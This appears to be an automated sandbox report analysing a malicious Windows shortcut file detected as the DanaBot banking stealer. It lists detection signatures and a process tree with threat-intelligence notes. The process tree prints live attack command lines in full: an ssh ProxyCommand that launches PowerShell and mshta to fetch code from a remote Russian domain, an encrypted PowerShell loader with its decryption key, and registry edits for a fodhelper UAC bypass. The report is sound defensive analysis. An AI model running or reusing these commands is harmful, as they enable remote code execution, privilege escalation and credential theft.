Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vreFmptfUu.lnk

Overview

General Information

Sample name:vreFmptfUu.lnk
renamed because original name is a hash value
Original sample name:0fd3c13d822c330db0ff496a85ba3d91.lnk
Analysis ID:1581224
MD5:0fd3c13d822c330db0ff496a85ba3d91
SHA1:418fca575accf1c328dd30ce218072c278fcbd37
SHA256:ac09a4ccc5885bd8cd9382802014f6a8eacf7ff53d50b88cc6a8a43b1732a5d3
Tags:lnkuser-abuse_ch
Infos:

Detection

DanaBot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected DanaBot stealer dll
AI detected suspicious sample
Machine Learning detection for dropped file
May use the Tor software to hide its network traffic
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Bypass UAC via Fodhelper.exe
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Windows shortcut file (LNK) contains suspicious command line arguments
Abnormal high CPU Usage
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the installation date of Windows
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Lolbin Ssh.exe Use As Proxy
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ssh.exe (PID: 7536 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7636 cmdline: powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://pravo-bashkortostan.ru/aaa.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 7936 cmdline: "C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDCD2A250E1B94DF3BE5873BF3A7890D5E7B8654695D20530BC9EF65B371EDFBA73316E25945A063D7A28BE0F4070D89BD71D08F1EC1392620E3F9E825A74316A5E9B8A7A70C3FC14D385B0D9F2A32F105EC66DC0B66EF10CB54D88BC0C2EC3C6D8B685C4A14BBFAF410E05F6F6457D7F9DA84102A348A56A4485CC1461217FCCC817704BD60EAE9427F8F126249479DA465DD0953880B50203DFB5DF97FEC094E492A4B417CF22BF841934ED24A0B0560EBF6DC9556D5FFD9549F51C870531BFA2BCFA700AD9EF423262F03922066B86DB35AA36FA7B763DCDD7176D82F2B7AF30B64970FA776C81DE60217D00F4B33DE2484A7526D3027184AB3318A44AC8E56A23A1E7AE21C561807980C57498B0BF9EF2CB743BB88450F5E4C7BFD72EF1467CDC3C67606AB945368DED820465416BA2A5775E52744944EAC6DA3F107DC69F469ACC6AF28A5520C7CF8FF549A145DC7A79D1CA66B1BB307B8BFE97041FB1F1CD07CA9DF7DDFD418D990B4FFF0ECB1DBDCFB5AE09034756A206FCED160FB71D4F142B6F97A20C8E1DF317F55051E54E9076BE72CCAA9E3538A276B4BA3BE1FA5C23EF88B84FED88D1E3F4D6ACF1A58A49CB7C35A80F797F9F1E55D3A01B4D42B956350FAF932B55519B6F7E70D2A0C998AA611AED9BEA8A07706D8B5704FC697F2C676DC5C4C1093EFEF23707B4BD489239CB80D30338E');$PYGob=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KYLfE('4344494372736B6F7955464B61484843')),[byte[]]::new(16)).TransformFinalBlock($ggUL,0,$ggUL.Length)); & $PYGob.Substring(0,3) $PYGob.Substring(283) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 1824 cmdline: "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 7556 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 1436 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • fodhelper.exe (PID: 7672 cmdline: FoDHelper.exe MD5: 85018BE1FD913656BC9FF541F017EACD)
                • cmd.exe (PID: 2112 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • cmd.exe (PID: 7860 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • powershell.exe (PID: 7688 cmdline: powershell.exe -w 1 -ep Unrestricted -nop MD5: 04029E121A0CFA5991749937DD22A1D9)
                      • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 6920 cmdline: "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 6680 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 7556 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • Acrobat.exe (PID: 7872 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 2228 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 2796 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1592,i,1127921047332727915,3798785087660649404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • cmd.exe (PID: 8536 cmdline: "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 8556 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 8576 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • fodhelper.exe (PID: 8592 cmdline: FoDHelper.exe MD5: 85018BE1FD913656BC9FF541F017EACD)
                • cmd.exe (PID: 8632 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • cmd.exe (PID: 8700 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 8708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • mama.exe (PID: 8756 cmdline: C:\Users\user\AppData\Roaming\mama.exe MD5: 72B6B07175EF611CE7DAA959A1248AAE)
                      • cmd.exe (PID: 8908 cmdline: cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                        • conhost.exe (PID: 8916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                        • WMIC.exe (PID: 8948 cmdline: wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • cmd.exe (PID: 8776 cmdline: "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 8792 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 8808 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • svchost.exe (PID: 6072 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DanaBotProofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on quality over quantity in email-based threats. DanaBots modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.
  • SCULLY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DanaBot_stealer_dllYara detected DanaBot stealer dllJoe Security
    0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DanaBot_stealer_dllYara detected DanaBot stealer dllJoe Security
        Process Memory Space: powershell.exe PID: 180INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x1ea196:$b1: ::WriteAllBytes(
        • 0x1eaaed:$b1: ::WriteAllBytes(
        • 0x27ba3b:$b1: ::WriteAllBytes(
        • 0x27c32f:$b1: ::WriteAllBytes(
        • 0x16cb3:$s1: -join
        • 0x17d97:$s1: -join
        • 0x18de9:$s1: -join
        • 0x1ddd1:$s1: -join
        • 0x1de0c:$s1: -join
        • 0x1ded3:$s1: -join
        • 0x1df01:$s1: -join
        • 0x1e0db:$s1: -join
        • 0x1e0fe:$s1: -join
        • 0x1e3b1:$s1: -join
        • 0x1e3d2:$s1: -join
        • 0x1e404:$s1: -join
        • 0x1e44c:$s1: -join
        • 0x1e479:$s1: -join
        • 0x1e4a0:$s1: -join
        • 0x1e4cb:$s1: -join
        • 0x1e4e7:$s1: -join
        Process Memory Space: mama.exe PID: 8756JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 1 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Bypass UAC via Fodhelper.exe
          Source: Process startedAuthor: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" ", CommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: FoDHelper.exe, ParentImage: C:\Windows\System32\fodhelper.exe, ParentProcessId: 7672, ParentProcessName: fodhelper.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" ", ProcessId: 2112, ProcessName: cmd.exe
          Sigma detected: Potentially Suspicious PowerShell Child Processes
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://pravo-bashkortostan.ru/aaa.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7836, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4, ProcessId: 7936, ProcessName: mshta.exe
          Sigma detected: Powerup Write Hijack DLL
          Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 180, TargetFilename: C:\Users\user\AppData\Local\Temp\r.bat
          Sigma detected: Suspicious MSHTA Child Process
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDCD2A250E1B94DF3BE5873BF3A7890D5E7B8654695D2
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDCD2A250E1B94DF3BE5873BF3A7890D5E7B8654695D2
          Sigma detected: Lolbin Ssh.exe Use As Proxy
